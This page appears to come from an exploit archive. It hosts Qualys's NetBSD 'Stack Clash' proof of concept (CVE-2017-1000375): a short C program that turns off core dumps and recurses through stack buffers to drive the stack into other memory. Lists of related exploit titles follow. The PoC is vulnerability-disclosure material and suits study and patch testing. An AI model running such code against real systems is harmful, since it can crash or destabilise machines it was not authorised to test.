Menu

Search for hundreds of thousands of exploits

"NetBSD - 'Stack Clash' (PoC)"

Author

Exploit author

"Qualys Corporation"

Platform

Exploit platform

netbsd_x86

Release date

Exploit published date

2017-06-28

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
/*
 * NetBSD_CVE-2017-1000375.c (please compile with -O0)
 * Copyright (C) 2017 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/time.h>

#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

static void
smash_no_jump(const size_t smash_size)
{
    char buf[1024];
    memset(buf, 'A', sizeof(buf));
    if (smash_size > sizeof(buf))
        smash_no_jump(smash_size - sizeof(buf));
}

int
main(const int argc, const char * const argv[])
{
    static const struct rlimit core;
    if (setrlimit(RLIMIT_CORE, &core)) die();

    if (argc != 2) die();
    const size_t smash_size = strtoul(argv[1], NULL, 0);
    if (smash_size <= 0 || smash_size >= SSIZE_MAX) die();
    smash_no_jump(smash_size);
    exit(EXIT_SUCCESS);
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2017-06-28 "NetBSD - 'Stack Clash' (PoC)" dos netbsd_x86 "Qualys Corporation"
2016-09-15 "NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)" local netbsd_x86 Metasploit
2010-05-18 "NetBSD 5.0 - Hack PATH Environment Overflow (PoC)" dos netbsd_x86 JMIT
2010-05-18 "NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)" dos netbsd_x86 JMIT
2006-12-01 "NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow" dos netbsd_x86 kcope
2002-04-03 "NetBSD 1.x - 'TalkD' User Validation" remote netbsd_x86 "Tekno pHReak"
1998-06-27 "NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File" local netbsd_x86 Gutierrez
Release Date Title Type Platform Author
2020-02-26 "OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution" remote openbsd "Qualys Corporation"
2020-02-26 "OpenSMTPD 6.6.3 - Arbitrary File Read" remote linux "Qualys Corporation"
2019-12-16 "OpenBSD 6.x - Dynamic Loader Privilege Escalation" local openbsd "Qualys Corporation"
2019-06-05 "Exim 4.87 < 4.91 - (Local / Remote) Command Execution" remote linux "Qualys Corporation"
2018-09-26 "Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation" local linux "Qualys Corporation"
2018-05-30 "Procps-ng - Multiple Vulnerabilities" local linux "Qualys Corporation"
2017-12-13 "GNU C Library Dynamic Loader glibc ld.so - Memory Leak / Buffer Overflow" local linux "Qualys Corporation"
2017-09-26 "Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation" local linux "Qualys Corporation"
2017-06-28 "Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation" local linux_x86 "Qualys Corporation"
2017-06-28 "OpenBSD - 'at Stack Clash' Local Privilege Escalation" local openbsd "Qualys Corporation"
2017-06-28 "Linux Kernel - 'offset2lib' Stack Clash" local linux_x86 "Qualys Corporation"
2017-06-28 "Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation" local solaris_x86 "Qualys Corporation"
2017-06-28 "FreeBSD - 'setrlimit' Stack Clash (PoC)" dos freebsd_x86 "Qualys Corporation"
2017-06-28 "FreeBSD - 'FGPE' Stack Clash (PoC)" dos freebsd_x86 "Qualys Corporation"
2017-06-28 "FreeBSD - 'FGPU' Stack Clash (PoC)" dos freebsd_x86 "Qualys Corporation"
2017-06-28 "NetBSD - 'Stack Clash' (PoC)" dos netbsd_x86 "Qualys Corporation"
2017-06-28 "Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation" local linux_x86 "Qualys Corporation"
2017-06-28 "Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation" local linux_x86-64 "Qualys Corporation"
2017-06-14 "Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation" local linux "Qualys Corporation"
2015-07-27 "Libuser Library - Multiple Vulnerabilities" dos linux "Qualys Corporation"
2015-03-18 "Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit)" remote linux "Qualys Corporation"
2002-07-09 "iPlanet Web Server 4.1 - Search Component File Disclosure" remote multiple "Qualys Corporation" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected